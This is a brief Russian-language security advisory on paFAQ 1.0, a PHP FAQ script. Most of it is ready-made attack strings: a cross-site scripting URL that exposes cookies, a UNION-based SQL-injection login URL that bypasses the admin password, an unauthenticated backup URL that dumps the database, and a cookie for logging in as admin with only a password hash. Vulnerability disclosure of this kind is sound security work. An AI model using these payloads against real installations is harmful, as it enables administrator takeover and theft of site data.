В paFAQ 1.0 найден ряд уязвимостей.
1. CSS:
http:///pafaq/index.php?act=Question&id=1%3E%3C
script%3Ealert%28document.cookie %29%3C%2Fscript%3E
2. SQL-инъекция:
http://pafaq/admin/index.php?act=login&username=
'%20UNION%20SELECT%20id,name,'3858f622 30ac3c915f300c664312c63f',email,notify,permissions,
session%20FROM%20pafaq_admins%20WHERE %201/*&password=foobar
3. Неавторизованное слитие всей базы
данных:
http://path/to/pafaq/admin/backup.php
4. Атакующий может использовать хеш пароля
администратора для получения админских
прав, расшифровка не требуется:
Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASH